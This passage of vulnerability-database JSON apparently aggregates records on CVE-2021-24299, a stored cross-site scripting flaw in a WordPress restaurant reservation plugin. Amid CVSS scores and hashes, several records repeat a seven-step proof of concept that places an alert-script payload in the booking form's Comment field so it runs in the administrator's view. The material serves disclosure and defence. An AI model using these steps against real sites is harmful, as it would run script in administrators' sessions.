"wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}, {"type": "threatpost", "idList": ["THREATPOST:DD9487C0547072A3416D474D48834495", "THREATPOST:7708D01A058A6DF41FF7A5CCCE039300", "THREATPOST:DDCAA8E4BD3EC8C100D49A47C46A06FD"]}], "modified": "2021-05-24T19:39:04", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-05-24T19:39:04", "rev": 2}}, "objectVersion": "1.5"}, "lastseen": "2021-05-24T19:39:04", "differentElements": ["cvss"], "edition": 1}], "viewCount": 28, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "threatpost", "idList": ["THREATPOST:7708D01A058A6DF41FF7A5CCCE039300", "THREATPOST:DD9487C0547072A3416D474D48834495", "THREATPOST:DDCAA8E4BD3EC8C100D49A47C46A06FD"]}], "modified": "2021-05-25T07:56:25", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-05-25T07:56:25", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.threatpost.ThreatpostBulletin", "robots.models.base.Bulletin"]}], "exploitdb": [{"id": "EDB-ID:49903", "hash": "239c26aa0b77b5c81fece8e40dc9406181b746175e57ecd83ee0fdecd5766d48", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WordPress Plugin ReDi Restaurant Reservation 21.0307 - &#039;Comment&#039; Stored Cross-Site Scripting (XSS)", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/49903", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-05-24T10:30:47", "history": [{"lastseen": "2021-05-24T10:30:47", "different_elements": ["cvss3", "cvss2"], "edition": 1, "bulletin": {"lastseen": "2021-05-24T10:30:47", "references": [], "description": "", "edition": 1, "cvss3": {}, "reporter": "Exploit-DB", "history": [], "published": "2021-05-24T00:00:00", "enchantments": {"score": {"rev": 2, "modified": "2021-05-24T10:30:47", "vector": "NONE", "value": 3.9}, "dependencies": {"rev": 2, "references": [{"idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"], "type": "wpvulndb"}, {"idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"], "type": "threatpost"}, {"idList": ["CVE-2021-24299"], "type": "cve"}, {"idList": ["PACKETSTORM:162756"], "type": "packetstorm"}, {"idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"], "type": "wpexploit"}], "modified": "2021-05-24T10:30:47"}}, "title": "WordPress Plugin ReDi Restaurant Reservation 21.0307 - &#039;Comment&#039; Stored Cross-Site Scripting (XSS)", "type": "exploitdb", "objectVersion": "1.5", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24299"], "immutableFields": [], "modified": "2021-05-24T00:00:00", "href": "https://www.exploit-db.com/exploits/49903", "id": "EDB-ID:49903", "viewCount": 48, "cvss": {"score": 0.0, "vector": "NONE"}, "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", "key": "type"}, {"hash": "2f1f1ca3589d8971906c56395a53d5e3", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "95bf9cc3329be4930e1400b42dfa5b7b", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "95bf9cc3329be4930e1400b42dfa5b7b", "key": "published"}, {"hash": "43f19d25637d2bbe4084390f53fdd98d", "key": "cvelist"}, {"hash": "e53848d9c7e659c4bd32f7af7ff99515", "key": "reporter"}, {"hash": "2b23003e6ff098efa1704c07f423e21e", "key": "href"}], "hash": "7ee35f5be93713b223e6515226aaf7ef07f3221ba2106546fa878d353d287ee4"}}], "viewCount": 53, "enchantments": {"dependencies": {"references": [{"idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"], "type": "wpvulndb"}, {"idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"], "type": "threatpost"}, {"idList": ["CVE-2021-24299"], "type": "cve"}, {"idList": ["PACKETSTORM:162756"], "type": "packetstorm"}, {"idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"], "type": "wpexploit"}], "modified": "2021-05-24T10:30:47", "rev": 2}, "score": {"value": 3.9, "vector": "NONE", "modified": "2021-05-24T10:30:47", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://www.exploit-db.com/download/49903", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Date: 2021-05-10\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.exploitdb.ExploitDbBulletin"], "scheme": null, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "43f19d25637d2bbe4084390f53fdd98d"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "cvss2", "hash": "4419eb17de947d4d6b67ac07ed8d9064"}, {"key": "cvss3", "hash": "d79524472d90697b9a92d39c19491dce"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "2b23003e6ff098efa1704c07f423e21e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "95bf9cc3329be4930e1400b42dfa5b7b"}, {"key": "published", "hash": "95bf9cc3329be4930e1400b42dfa5b7b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "title", "hash": "2f1f1ca3589d8971906c56395a53d5e3"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}]}], "packetstorm": [{"id": "PACKETSTORM:162756", "hash": "4f2231b7ed6476925559d2cfdab1c198", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Cross Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/162756/WordPress-ReDi-Restaurant-Reservation-21.0307-Cross-Site-Scripting.html", "reporter": "Bastijn Ouwendijk", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-05-24T14:31:08", "history": [], "viewCount": 39, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}], "modified": "2021-05-24T14:31:08", "rev": 2}, "score": {"value": 4.7, "vector": "NONE", "modified": "2021-05-24T14:31:08", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://packetstormsecurity.com/files/download/162756/wpredirr210307-xss.txt", "sourceData": "`# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS) \n# Date: 2021-05-10 \n# Exploit Author: Bastijn Ouwendijk \n# Vendor Homepage: https://reservationdiary.eu/ \n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/ \n# Version: 21.0307 and earlier \n# Tested on: Windows 10 \n# CVE : CVE-2021-24299 \n# Proof: https://bastijnouwendijk.com/cve-2021-24299/ \n \nSteps to exploit this vulnerability: \n \n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information \n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>` \n3. Submit the form \n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC) \n5. Click on 'View upcoming reservations' \n6. Select for 'Show reservations for': 'This week' \n7. The reservations are loaded and two alerts are shown with text 'XSS' \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"]}], "zdt": [{"id": "1337DAY-ID-36289", "hash": "bc046cebd1ac362460dd887de6d80a51", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-10-23T14:32:19", "history": [{"bulletin": {"id": "1337DAY-ID-36289", "hash": "b9cc253d3219d870dbb04871a6c809c2", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting\n", "description": "CVE-2021-24299", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-01T13:30:36", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-01] #"}, "lastseen": "2021-09-01T13:30:36", "differentElements": ["description", "title"], "edition": 1}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "becb45c5551197bd0534c4eeac6c9b0c", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-01T17:37:23", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-01] #"}, "lastseen": "2021-09-01T17:37:23", "differentElements": ["sourceData"], "edition": 2}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "63801e389fd023ccf70bf92aec96f19e", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-01T22:23:24", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}], "modified": "2021-09-01T22:23:24", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-01T22:23:24", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-02] #"}, "lastseen": "2021-09-01T22:23:24", "differentElements": ["sourceData"], "edition": 3}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "851f17dda41e41cf2db2bd385c1ad8b3", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-02T22:25:08", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}], "modified": "2021-09-02T22:25:08", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-02T22:25:08", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-03] #"}, "lastseen": "2021-09-02T22:25:08", "differentElements": ["sourceData"], "edition": 4}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "9fb4728b2e6fa9b7f6197ba6dc471f4e", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-03T22:21:26", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}], "modified": "2021-09-03T22:21:26", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-03T22:21:26", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-04] #"}, "lastseen": "2021-09-03T22:21:26", "differentElements": ["sourceData"], "edition": 5}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "c80fcf7e16f9898deec1fd3668c38697", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": 